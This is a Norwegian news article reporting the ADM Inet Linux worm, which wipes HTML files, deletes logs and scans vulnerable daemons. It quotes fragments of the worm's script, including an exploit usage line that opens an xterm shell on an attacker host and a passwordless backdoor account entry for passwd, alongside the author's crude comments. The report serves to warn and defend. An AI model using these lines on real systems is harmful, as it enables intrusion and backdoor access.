Linux-orm funnet i vill tilstand

Linux-brukere har nå kommet over en ny orm som oppfører seg temmelig ondsinnet. Blant annet sletter den innholdet i alle HTML-filer den kommer over.

En ny Linux-orm ble i begynnelsen av mars oppdaget I Russland. Ormen ser ifølge en innstender til Bugtraq-listen ut til å bestå av et lite antall kjørbare filer koblet sammen med et skript. Hovedfilen er heter trolig "admwOrm" og altså er den nevnte skriptfilen. Innholdet i filen inkluderer de følgende strengene:

-----admw0rm-----

#!/bin/sh
# ADM Inet w0rm
# Linux X86 spef.. anyway it's my first w0rm :)
# ver 0.1
# i'm not responsable of the usage of diz w0rm !!!
# greetz: to all blondes with the short hairs who look's good =), the netg
# sistah, all of the handrail's i'll slide, all of the sweden chix i'll fuk ;)
# and The ADM Crew oooooooofffffff course heh
# LIFE IS A BITCH, BE HARDCORE WITH 'EM, DONT FINISH LIKE ME !
# ********************* THE CREW WILL NEVER DIE ***************************

EMAIL="admsmb@hotmail.com"
SAY="The ADM Inet w0rm is here !"

-----Hnamed----

--= The ADM CreW =--
%s victim arg0 arg1 ...
ex:sploits www.juergen.ch /usr/X11R6/bin/xterm -display ppp666.hax0r.com:0

-----

Ifølge innsenderen til Bugtraq, gjør ormen en rekke forskjellige "oppgaver". De fleste oppgavene er temmelig typiske for ormer, inkludert portskanning og sletting av logger. Men denne ormen leter også etter filer med ekstensjonen .html i filnavnet. Innholdet i disse filene blir erstattet med innholdet i SAY-variabelen i koden ovenfor.

I tillegg oppretter ormen en underkatalog med navnet ".wOrmOr/" i /tmp-katalogen, samt at den muligens setter inn følgende streng i passwd-filen på den angrepne maskinen:

"w0rm::2666:777:ADM Inet w0rm:/:/bin/sh"

Ormen skal kunne oppdage en rekke velkjente svakheter i Linux ved å skanne porter som e-post (IMAP og POP), rsh/rlogin, telnet, FTP, finger og gopher.

Så fort ormen har infisert et system, vil den trolig begynne å skanne etter andre sårbare maskiner. Det er foreløpig ikke klart hvordan den velger ut IP-adressene, men innsenderen av dette bugvarselet mistenker at det er filen "gimmieip" som er gjør dette.

Foreløpig er det ikke utarbeidet noe sikker måte å fjerne denne ormen på, hvis maskinen din allerede er blitt angrepet. Det er sannsynlig at det er tilstrekkelig å fjerne alle binærfilene som tilhører ormen. Disse ser ut til å bli lagret i /tmp-katalogen. Men foreløpig er ikke problemet blitt testet nok til å vite om dette er tilstrekkelig for å bli kvitt ormen for godt.

Å unngå å bli smittet av ormen, er i og for seg enkelt. Ormen utnytter som nevnt kjente svakheter i daemon-ene i Linux. De fleste av disse hullene er for lengst blitt tettet igjen i nyere utgaver av disse tjenerne, men ikke alle installerer de oppdaterte utgavene når de blir gitt ut. De brukerne som holder seg oppdatert er derfor normalt forskånet for slike angrep.

Til toppen